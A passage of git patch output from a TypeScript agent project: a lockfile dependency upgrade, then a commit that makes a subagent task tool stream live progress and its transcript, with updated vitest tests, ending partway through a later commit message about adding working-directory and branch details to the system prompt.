3.0.3 - '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13) + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) zod: 4.1.13 - '@ai-sdk/mcp@0.0.12(zod@4.1.13)': + '@ai-sdk/mcp@1.0.43(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 2.0.0 - '@ai-sdk/provider-utils': 3.0.19(zod@4.1.13) + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) pkce-challenge: 5.0.1 zod: 4.1.13 - '@ai-sdk/openai@3.0.10(zod@4.1.13)': + '@ai-sdk/openai@3.0.65(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 3.0.3 - '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13) - zod: 4.1.13 - - '@ai-sdk/provider-utils@3.0.19(zod@4.1.13)': - dependencies: - '@ai-sdk/provider': 2.0.0 - '@standard-schema/spec': 1.1.0 - eventsource-parser: 3.0.6 - zod: 4.1.13 - - '@ai-sdk/provider-utils@3.0.24(zod@4.1.13)': - dependencies: - '@ai-sdk/provider': 2.0.2 - '@standard-schema/spec': 1.1.0 - eventsource-parser: 3.0.6 - zod: 4.1.13 - - '@ai-sdk/provider-utils@4.0.0-beta.38(zod@4.1.13)': - dependencies: - '@ai-sdk/provider': 3.0.0-beta.20 - '@standard-schema/spec': 1.1.0 - eventsource-parser: 3.0.6 + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) zod: 4.1.13 - '@ai-sdk/provider-utils@4.0.6(zod@4.1.13)': + '@ai-sdk/provider-utils@4.0.27(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 3.0.3 + '@ai-sdk/provider': 3.0.10 '@standard-schema/spec': 1.1.0 - eventsource-parser: 3.0.6 + eventsource-parser: 3.0.8 zod: 4.1.13 '@ai-sdk/provider@1.1.3': dependencies: json-schema: 0.4.0 - '@ai-sdk/provider@2.0.0': - dependencies: - json-schema: 0.4.0 - - '@ai-sdk/provider@2.0.2': - dependencies: - json-schema: 0.4.0 - - '@ai-sdk/provider@3.0.0-beta.20': - dependencies: - json-schema: 0.4.0 - - '@ai-sdk/provider@3.0.3': + '@ai-sdk/provider@3.0.10': dependencies: json-schema: 0.4.0 @@ -8716,10 +8622,10 @@ snapshots: dependencies: zod: 4.1.13 - '@composio/vercel@0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.0-beta.122(zod@4.1.13))': + '@composio/vercel@0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.190(zod@4.1.13))': dependencies: '@composio/core': 0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13) - ai: 6.0.0-beta.122(zod@4.1.13) + ai: 6.0.190(zod@4.1.13) '@crawlee/types@3.15.3': dependencies: @@ -11704,7 +11610,7 @@ snapshots: - supports-color - utf-8-validate - '@trigger.dev/sdk@4.4.3(ai@6.0.0-beta.122(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)': + '@trigger.dev/sdk@4.4.3(ai@6.0.190(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)': dependencies: '@opentelemetry/api': 1.9.0 '@opentelemetry/semantic-conventions': 1.36.0 @@ -11720,7 +11626,7 @@ snapshots: ws: 8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10) zod: 4.1.13 optionalDependencies: - ai: 6.0.0-beta.122(zod@4.1.13) + ai: 6.0.190(zod@4.1.13) transitivePeerDependencies: - bufferutil - supports-color @@ -11989,17 +11895,13 @@ snapshots: optionalDependencies: '@aws-sdk/credential-provider-web-identity': 3.972.13 - '@vercel/oidc@3.0.5': {} - - '@vercel/oidc@3.1.0': {} - '@vercel/oidc@3.2.0': {} '@vercel/oidc@3.4.0': {} '@vercel/queue@0.1.4': dependencies: - '@vercel/oidc': 3.2.0 + '@vercel/oidc': 3.4.0 minimatch: 10.2.5 mixpart: 0.0.5 picocolors: 1.1.1 @@ -13093,17 +12995,13 @@ snapshots: dependencies: humanize-ms: 1.2.1 - ai@6.0.0-beta.122(zod@4.1.13): + ai@6.0.190(zod@4.1.13): dependencies: - '@ai-sdk/gateway': 2.0.0-beta.66(zod@4.1.13) - '@ai-sdk/provider': 3.0.0-beta.20 - '@ai-sdk/provider-utils': 4.0.0-beta.38(zod@4.1.13) + '@ai-sdk/gateway': 3.0.119(zod@4.1.13) + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) '@opentelemetry/api': 1.9.0 zod: 4.1.13 - transitivePeerDependencies: - - '@valibot/to-json-schema' - - arktype - - effect ajv-formats@3.0.1(ajv@8.17.1): optionalDependencies: @@ -14589,6 +14487,8 @@ snapshots: eventsource-parser@3.0.6: {} + eventsource-parser@3.0.8: {} + eventsource@3.0.7: dependencies: eventsource-parser: 3.0.6 From 386c4ee232107b75665e24377aad108b674e440a Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 19:20:20 -0500 Subject: [PATCH 08/10] feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple chunks during the subagent run so the chat UI can render: - An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp - A live `pending: {name, input}` indicator for each tool-call - Accumulated `usage` after each finish-step - A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering `toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context. New (SRP, one function per file): - lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders. Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match. Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) --- .../__tests__/sumLanguageModelUsage.test.ts | 27 ++ .../messageMetadata/sumLanguageModelUsage.ts | 21 ++ .../__tests__/askUserQuestionTool.test.ts | 14 +- lib/agent/tools/__tests__/taskTool.test.ts | 273 ++++++++++++------ lib/agent/tools/askUserQuestionTool.ts | 2 +- lib/agent/tools/taskTool.ts | 155 ++++++---- 6 files changed, 343 insertions(+), 149 deletions(-) create mode 100644 lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts create mode 100644 lib/agent/messageMetadata/sumLanguageModelUsage.ts diff --git a/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts b/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts new file mode 100644 index 000000000..403bbe5ab --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts @@ -0,0 +1,27 @@ +import { describe, it, expect } from "vitest"; +import { sumLanguageModelUsage } from "@/lib/agent/messageMetadata/sumLanguageModelUsage"; + +describe("sumLanguageModelUsage", () => { + it("returns undefined when both inputs are undefined", () => { + expect(sumLanguageModelUsage(undefined, undefined)).toBeUndefined(); + }); + + it("returns the second input when first is undefined", () => { + const u = { inputTokens: 100, outputTokens: 50 }; + expect(sumLanguageModelUsage(undefined, u as never)).toBe(u); + }); + + it("returns the first input when second is undefined", () => { + const u = { inputTokens: 100, outputTokens: 50 }; + expect(sumLanguageModelUsage(u as never, undefined)).toBe(u); + }); + + it("sums the two inputs pointwise when both are present", () => { + const result = sumLanguageModelUsage( + { inputTokens: 100, outputTokens: 50 } as never, + { inputTokens: 200, outputTokens: 75 } as never, + ); + expect(result?.inputTokens).toBe(300); + expect(result?.outputTokens).toBe(125); + }); +}); diff --git a/lib/agent/messageMetadata/sumLanguageModelUsage.ts b/lib/agent/messageMetadata/sumLanguageModelUsage.ts new file mode 100644 index 000000000..2f400f33b --- /dev/null +++ b/lib/agent/messageMetadata/sumLanguageModelUsage.ts @@ -0,0 +1,21 @@ +import type { LanguageModelUsage } from "ai"; +import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage"; + +/** + * Sum two optional `LanguageModelUsage` records. Returns the sum when + * both are defined, the defined one when only one is, or `undefined` + * when neither is. Mirrors open-agents' `sumLanguageModelUsage` in + * `packages/agent/usage.ts`. + * + * Used by the `task` tool's progress streaming to accumulate usage + * across subagent steps without introducing zero-tokens placeholders + * before the first step finishes. + */ +export function sumLanguageModelUsage( + a: LanguageModelUsage | undefined, + b: LanguageModelUsage | undefined, +): LanguageModelUsage | undefined { + if (!a) return b; + if (!b) return a; + return addLanguageModelUsage(a, b); +} diff --git a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts index ee55e6305..79995551a 100644 --- a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts +++ b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts @@ -81,14 +81,16 @@ describe("askUserQuestionTool — server-side wiring", () => { describe("askUserQuestionTool.toModelOutput", () => { it("returns a generic message when no output is present", () => { - expect(askUserQuestionTool.toModelOutput!(undefined as never)).toEqual({ + expect(askUserQuestionTool.toModelOutput!({ output: undefined } as never)).toEqual({ type: "text", value: "User did not respond to questions.", }); }); it("formats `declined: true` as a clear decline message", () => { - const result = askUserQuestionTool.toModelOutput!({ declined: true } as never); + const result = askUserQuestionTool.toModelOutput!({ + output: { declined: true }, + } as never); expect(result).toMatchObject({ type: "text", value: expect.stringMatching(/declined to answer/i), @@ -97,9 +99,11 @@ describe("askUserQuestionTool.toModelOutput", () => { it("formats answered questions as a parseable Q=A summary", () => { const result = askUserQuestionTool.toModelOutput!({ - answers: { - "Which model do you want?": "Haiku", - "Which features?": ["Streaming", "Tools"], + output: { + answers: { + "Which model do you want?": "Haiku", + "Which features?": ["Streaming", "Tools"], + }, }, } as never); expect(result).toMatchObject({ diff --git a/lib/agent/tools/__tests__/taskTool.test.ts b/lib/agent/tools/__tests__/taskTool.test.ts index 609037918..8e876afdb 100644 --- a/lib/agent/tools/__tests__/taskTool.test.ts +++ b/lib/agent/tools/__tests__/taskTool.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, vi, beforeEach } from "vitest"; -import { taskTool } from "@/lib/agent/tools/taskTool"; +import { taskTool, type TaskToolOutput } from "@/lib/agent/tools/taskTool"; import { streamText } from "ai"; import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; @@ -12,79 +12,176 @@ vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ connectVercel: vi.fn(), })); -// `model` is normally attached by `runAgentStep` before the subagent -// sees the context. The opaque sentinel below is enough for taskTool -// to pass it into `streamText` — we assert the same instance flows -// through. -const mainModel = { __sentinel: "main-model" } as never; -const subagentModelOverride = { __sentinel: "subagent-model" } as never; +const mainModel = { modelId: "anthropic/claude-haiku-4.5" } as never; +const subagentModelOverride = { modelId: "anthropic/claude-sonnet-4.6" } as never; const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, model: mainModel, }; -function makeStreamTextResult(finalText: string) { +function makeStreamResult(opts: { + toolCalls?: Array<{ toolName: string; input: unknown }>; + finishSteps?: number; + responseMessages?: Array<{ role: string; content: unknown }>; + totalUsage?: unknown; +}) { + const calls = opts.toolCalls ?? []; + const finishCount = opts.finishSteps ?? 1; return { fullStream: (async function* () { - // empty — execute only awaits `result.finishReason` + result.response + for (const c of calls) { + yield { type: "tool-call", toolName: c.toolName, input: c.input }; + } + for (let i = 0; i < finishCount; i++) { + yield { + type: "finish-step", + usage: { inputTokens: 100, outputTokens: 25, totalTokens: 125 }, + }; + } })(), + response: Promise.resolve({ messages: opts.responseMessages ?? [] }), + totalUsage: Promise.resolve(opts.totalUsage ?? { inputTokens: 0, outputTokens: 0 }), finishReason: Promise.resolve("stop"), - response: Promise.resolve({ - messages: [ - { - role: "assistant", - content: [{ type: "text", text: finalText }], - }, - ], - }), }; } +async function drainGenerator(gen: AsyncGenerator | AsyncIterable): Promise { + const out: T[] = []; + for await (const chunk of gen) out.push(chunk); + return out; +} + beforeEach(() => { vi.clearAllMocks(); vi.mocked(connectVercel).mockResolvedValue({ workingDirectory: "/sandbox/mono" } as never); }); -describe("taskTool.execute", () => { - it("runs a sub-streamText with the subagent system prompt + task + instructions", async () => { - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("Task done.") as never); - const result = (await taskTool.execute!( - { task: "Find the largest .ts file", instructions: "Use glob and stat to find it" }, - { experimental_context: ctx } as never, - )) as { success: boolean; summary: string }; - expect(result.success).toBe(true); - expect(result.summary).toBe("Task done."); - const args = vi.mocked(streamText).mock.calls[0]?.[0] as Record; - // system prompt contains task + instructions so the subagent knows its scope - expect(args.system).toEqual(expect.stringContaining("Find the largest .ts file")); - expect(args.system).toEqual(expect.stringContaining("Use glob and stat")); +describe("taskTool.execute (async generator)", () => { + it("yields an initial chunk with toolCallCount=0 + startedAt + modelId before the subagent does any work", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never); + const gen = taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator; + const first = await gen.next(); + expect(first.done).toBe(false); + expect(first.value).toMatchObject({ + toolCallCount: 0, + modelId: "anthropic/claude-haiku-4.5", + }); + expect(first.value.startedAt).toBeTypeOf("number"); + // Drain to finish. + await drainGenerator(gen); }); - it("registers only the executor tool set (no recursion, no task/ask/skill/todo/fetch)", async () => { - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); - await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never); + it("emits a `pending` chunk with name + input on every tool-call", async () => { + vi.mocked(streamText).mockReturnValue( + makeStreamResult({ + toolCalls: [ + { toolName: "bash", input: { command: "ls" } }, + { toolName: "read", input: { path: "/foo" } }, + ], + finishSteps: 1, + responseMessages: [{ role: "assistant", content: [{ type: "text", text: "done" }] }], + }) as never, + ); + const chunks = (await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + )) as TaskToolOutput[]; + // Two tool-call yields + one finish-step yield (sticky pending so the + // UI doesn't flicker back to an initializing state between steps). + const pendingChunks = chunks.filter(c => c.pending); + expect(pendingChunks).toHaveLength(3); + expect(pendingChunks[0]?.pending).toEqual({ name: "bash", input: { command: "ls" } }); + expect(pendingChunks[0]?.toolCallCount).toBe(1); + expect(pendingChunks[1]?.pending).toEqual({ name: "read", input: { path: "/foo" } }); + expect(pendingChunks[1]?.toolCallCount).toBe(2); + // Finish-step keeps the most recent pending sticky. + expect(pendingChunks[2]?.pending).toEqual({ name: "read", input: { path: "/foo" } }); + }); + + it("accumulates usage across finish-step parts", async () => { + vi.mocked(streamText).mockReturnValue( + makeStreamResult({ + finishSteps: 2, + responseMessages: [{ role: "assistant", content: [{ type: "text", text: "ok" }] }], + }) as never, + ); + const chunks = (await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + )) as TaskToolOutput[]; + const usageChunks = chunks.filter(c => c.usage); + // 2 finish-step yields + 1 final yield = 3 chunks carrying usage + expect(usageChunks.length).toBeGreaterThanOrEqual(2); + const last = usageChunks[usageChunks.length - 1]!; + expect(last.usage).toMatchObject({ inputTokens: 200, outputTokens: 50 }); + }); + + it("emits a final chunk containing the subagent's full response.messages transcript", async () => { + const responseMessages = [ + { role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] }, + { role: "tool", content: [{ type: "tool-result", output: "..." }] }, + { role: "assistant", content: [{ type: "text", text: "Done." }] }, + ]; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ responseMessages }) as never); + const chunks = (await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + )) as TaskToolOutput[]; + const finalChunk = chunks.find(c => c.final); + expect(finalChunk).toBeDefined(); + expect(finalChunk!.final).toEqual(responseMessages); + expect(finalChunk!.toolCallCount).toBe(0); + expect(finalChunk!.usage).toBeDefined(); + }); + + it("uses the subagentModel override when set on the agent context", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never); + await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: { ...ctx, subagentModel: subagentModelOverride }, + } as never) as AsyncGenerator, + ); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; + expect(args.model).toBe(subagentModelOverride); + }); + + it("throws when agent context is missing the `model` field", async () => { + const gen = taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: { sandbox: ctx.sandbox /* no model */ }, + } as never) as AsyncGenerator; + await expect(gen.next()).rejects.toThrow(/model not initialized/i); + }); + + it("registers only the executor tool set on the inner streamText call", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never); + await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + ); const args = vi.mocked(streamText).mock.calls[0]?.[0] as { tools: Record }; - const toolNames = Object.keys(args.tools).sort(); - expect(toolNames).toEqual(["bash", "edit", "glob", "grep", "read", "write"]); - // Critical: NO task (recursion guard) and NO client-side tools. - expect(args.tools).not.toHaveProperty("task"); - expect(args.tools).not.toHaveProperty("ask_user_question"); - expect(args.tools).not.toHaveProperty("skill"); - expect(args.tools).not.toHaveProperty("todo_write"); - expect(args.tools).not.toHaveProperty("web_fetch"); + expect(Object.keys(args.tools).sort()).toEqual([ + "bash", + "edit", + "glob", + "grep", + "read", + "write", + ]); }); - it("passes a non-empty prompt so the model has something to act on", async () => { - // Regression: a previous version called streamText with `messages: []`, - // which caused the AI SDK to throw NoOutputGeneratedError because zero - // steps were recorded — the model had a system prompt but no user turn - // to respond to. The subagent must receive an explicit user-side trigger. - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); - await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never); + it("passes a non-empty prompt so the model has something to act on (NoOutputGeneratedError regression)", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never); + await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + ); const args = vi.mocked(streamText).mock.calls[0]?.[0] as { prompt?: string; messages?: unknown[]; @@ -93,54 +190,46 @@ describe("taskTool.execute", () => { const hasMessages = Array.isArray(args.messages) && args.messages.length > 0; expect(hasPrompt || hasMessages).toBe(true); }); +}); - it("inherits the parent's `model` from agent context when no subagentModel override is set", async () => { - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); - await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never); - const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; - expect(args.model).toBe(mainModel); +describe("taskTool.toModelOutput", () => { + it("returns 'Task completed.' when no `final` is present", () => { + const out = taskTool.toModelOutput!({ output: {} } as never); + expect(out).toEqual({ type: "text", value: "Task completed." }); }); - it("prefers `subagentModel` over `model` when both are set on the context", async () => { - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); - await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: { ...ctx, subagentModel: subagentModelOverride }, + it("extracts the last assistant text part from the transcript", () => { + const out = taskTool.toModelOutput!({ + output: { + final: [ + { role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] }, + { role: "tool", content: [{ type: "tool-result" }] }, + { + role: "assistant", + content: [ + { type: "tool-call", toolName: "read" }, + { type: "text", text: "Found 3 files." }, + ], + }, + ], + }, } as never); - const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; - expect(args.model).toBe(subagentModelOverride); + expect(out).toEqual({ type: "text", value: "Found 3 files." }); }); - it("returns success:false when no assistant text is in the response", async () => { - vi.mocked(streamText).mockReturnValue({ - fullStream: (async function* () {})(), - finishReason: Promise.resolve("stop"), - response: Promise.resolve({ messages: [] }), + it("handles a string-valued content directly", () => { + const out = taskTool.toModelOutput!({ + output: { final: [{ role: "assistant", content: "plain text reply" }] }, } as never); - const result = (await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never)) as { success: boolean; summary: string }; - expect(result.success).toBe(false); - expect(result.summary).toMatch(/no.*assistant/i); - }); - - it("returns success:false with a descriptive error when streamText throws", async () => { - vi.mocked(streamText).mockImplementation(() => { - throw new Error("gateway down"); - }); - const result = (await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never)) as { success: boolean; error: string }; - expect(result.success).toBe(false); - expect(result.error).toMatch(/gateway down/); + expect(out).toEqual({ type: "text", value: "plain text reply" }); }); - it("throws when agent context is missing the `model` field", async () => { - await expect( - taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: { sandbox: ctx.sandbox /* no model */ }, - } as never), - ).rejects.toThrow(/model not initialized/i); + it("falls back to 'Task completed.' when the last assistant message has no text parts", () => { + const out = taskTool.toModelOutput!({ + output: { + final: [{ role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] }], + }, + } as never); + expect(out).toEqual({ type: "text", value: "Task completed." }); }); }); diff --git a/lib/agent/tools/askUserQuestionTool.ts b/lib/agent/tools/askUserQuestionTool.ts index 8d5e1f4ed..1e15b27f4 100644 --- a/lib/agent/tools/askUserQuestionTool.ts +++ b/lib/agent/tools/askUserQuestionTool.ts @@ -57,7 +57,7 @@ Usage notes: outputSchema: askUserQuestionOutputSchema, // NO execute: this is a client-side tool. streamText halts the run after // emitting the tool-call; the chat UI fulfills it asynchronously. - toModelOutput: output => { + toModelOutput: ({ output }) => { if (!output) { return { type: "text", value: "User did not respond to questions." }; } diff --git a/lib/agent/tools/taskTool.ts b/lib/agent/tools/taskTool.ts index 83381d58f..270974fce 100644 --- a/lib/agent/tools/taskTool.ts +++ b/lib/agent/tools/taskTool.ts @@ -1,7 +1,8 @@ -import { streamText, stepCountIs, tool } from "ai"; +import { streamText, stepCountIs, tool, type LanguageModelUsage, type ModelMessage } from "ai"; import { z } from "zod"; import { buildSubagentTools } from "@/lib/agent/tools/buildSubagentTools"; import { getSubagentModel } from "@/lib/agent/tools/getSubagentModel"; +import { sumLanguageModelUsage } from "@/lib/agent/messageMetadata/sumLanguageModelUsage"; const SUBAGENT_STEP_LIMIT = 30; @@ -20,6 +21,32 @@ const taskInputSchema = z.object({ ), }); +const taskPendingToolCallSchema = z.object({ + name: z.string(), + input: z.unknown(), +}); + +export type TaskPendingToolCall = z.infer; + +/** + * Output schema mirrors open-agents' `taskOutputSchema` + * (`packages/agent/tools/task.ts`) so the chat UI can render the same + * live progress card and expandable subagent transcript when cut over + * to api's `/api/chat/workflow`. The `execute` is an async generator + * that yields multiple chunks during the subagent run; the AI SDK + * pipes each yield through `tool-output-available`. + */ +const taskOutputSchema = z.object({ + pending: taskPendingToolCallSchema.optional(), + toolCallCount: z.number().int().nonnegative().optional(), + startedAt: z.number().int().nonnegative().optional(), + modelId: z.string().optional(), + final: z.custom().optional(), + usage: z.custom().optional(), +}); + +export type TaskToolOutput = z.infer; + const SUBAGENT_SYSTEM_PROMPT = `You are a focused subagent invoked by a parent agent. Run autonomously — do not ask the user clarifying questions. Complete the delegated task using the tools you have, then return a concise summary of what you did. Constraints: @@ -35,9 +62,11 @@ Constraints: * concise summary that the parent can incorporate. * * Slim port of open-agents' multi-type SUBAGENT_REGISTRY → single - * generic subagent. Streaming progress isn't piped to the UI (the - * parent sees one long-running tool call until completion); add an - * async-generator execute later if live progress matters. + * generic subagent, but the live-progress streaming pattern is a + * faithful port: the execute is `async function*`, yielding + * `{pending, toolCallCount, usage, modelId, startedAt}` chunks + * throughout the subagent run and a final `{final: ModelMessage[], …}` + * chunk carrying the full subagent transcript for UI rendering. */ export const taskTool = tool({ description: `Launch a subagent to handle complex tasks autonomously. @@ -66,57 +95,81 @@ IMPORTANT: - Include critical context (APIs, function names, file paths) in the instructions - The parent agent does not see the subagent's internal tool calls, only its final summary`, inputSchema: taskInputSchema, - execute: async ({ task, instructions }, { experimental_context, abortSignal }) => { - // Resolves to ctx.subagentModel ?? ctx.model, throwing if context - // wasn't populated by runAgentStep. Mirrors open-agents' task tool - // (`getSubagentModel(experimental_context, "task")`). + outputSchema: taskOutputSchema, + execute: async function* ({ task, instructions }, { experimental_context, abortSignal }) { const subagentModel = getSubagentModel(experimental_context, "task"); - - try { - // `prompt` (not `messages: []`) is required — the AI SDK records zero - // steps and throws NoOutputGeneratedError if the model has only a - // system prompt with no user turn. Mirrors open-agents' task tool. - const result = streamText({ - model: subagentModel, - system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`, - prompt: "Complete this task and provide a summary of what you accomplished.", - tools: buildSubagentTools(), - stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT), - experimental_context, - abortSignal, - }); - - // Drain fullStream so the subagent actually runs to completion. - // Streaming progress back to the parent UI is not wired in this slim - // port — the parent sees one long-running tool call until the - // subagent finishes. - for await (const _part of result.fullStream) { - void _part; - } - - const response = await result.response; - const lastAssistant = response.messages.findLast(m => m.role === "assistant"); - const content = lastAssistant?.content; - - let summary = ""; - if (typeof content === "string") { - summary = content; - } else if (Array.isArray(content)) { - const lastText = content.findLast(p => p.type === "text"); - if (lastText && "text" in lastText) summary = lastText.text; + const subagentModelId = + typeof subagentModel === "string" + ? subagentModel + : (subagentModel as { modelId?: string }).modelId; + + // `prompt` (not `messages: []`) is required — the AI SDK records zero + // steps and throws NoOutputGeneratedError if the model has only a + // system prompt with no user turn. Mirrors open-agents' task tool. + const result = streamText({ + model: subagentModel, + system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`, + prompt: "Complete this task and provide a summary of what you accomplished.", + tools: buildSubagentTools(), + stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT), + experimental_context, + abortSignal, + }); + + const startedAt = Date.now(); + let toolCallCount = 0; + let pending: TaskPendingToolCall | undefined; + let usage: LanguageModelUsage | undefined; + + // Emit an initial chunk so the UI can render elapsed time from a + // stable timestamp and show "Subagent · 0 tools · 0 tokens" before + // the first step finishes. + yield { toolCallCount, startedAt, modelId: subagentModelId }; + + for await (const part of result.fullStream) { + if (part.type === "tool-call") { + toolCallCount += 1; + pending = { name: part.toolName, input: part.input }; + yield { pending, toolCallCount, usage, startedAt, modelId: subagentModelId }; } - if (!summary) { - return { - success: false, - summary: "Subagent finished with no assistant text. The task may be incomplete.", - }; + if (part.type === "finish-step") { + usage = sumLanguageModelUsage(usage, part.usage); + // Keep the last observed `pending` so task UIs don't flicker + // back to an initializing state between subagent steps. + yield { pending, toolCallCount, usage, startedAt, modelId: subagentModelId }; } - - return { success: true, summary }; - } catch (error) { - const message = error instanceof Error ? error.message : String(error); - return { success: false, error: `Subagent failed: ${message}` }; } + + const response = await result.response; + const finalUsage = usage ?? (await result.totalUsage); + yield { + final: response.messages, + toolCallCount, + usage: finalUsage, + startedAt, + modelId: subagentModelId, + }; + }, + /** + * Extract the last assistant text from the subagent's transcript + * for inclusion in the parent agent's context. Mirrors open-agents' + * `toModelOutput` (`packages/agent/tools/task.ts`). Operates on the + * FINAL yielded chunk's `output.final`. + */ + toModelOutput: ({ output }) => { + const messages = output?.final; + if (!messages) return { type: "text", value: "Task completed." }; + + const lastAssistant = messages.findLast(m => m.role === "assistant"); + const content = lastAssistant?.content; + if (!content) return { type: "text", value: "Task completed." }; + + if (typeof content === "string") return { type: "text", value: content }; + + const lastTextPart = content.findLast(p => p.type === "text"); + if (!lastTextPart) return { type: "text", value: "Task completed." }; + + return { type: "text", value: lastTextPart.text }; }, }); From f3b8954c530300b1462e193e76c256997abf8f2d Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 21:15:01 -0500 Subject: [PATCH 09/10] feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7) Third open-agents → api cutover bundle. The handler hardcoded `workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set `currentBranch`, so the agent had no environment info in its system prompt and had to run `pwd` / `git branch` on every turn. Production verification (today, before this fix): agent: "My system prompt does not contain working directory or branch information." After this fix the agent receives an Environment section + Current branch line + cloud-sandbox checkpointing block — same shape as open-agents (sandbox.recoupable.com) emits. Changes: - New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles environment section → Current branch → cloud-sandbox checkpointing → custom instructions, all conditional on inputs. Mirrors open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts). - New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}` placeholder substitution. - `handleChatWorkflowStream`: connect the sandbox once for both skill discovery AND cwd/branch reading, then thread real values into `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On connect failure, fall back to 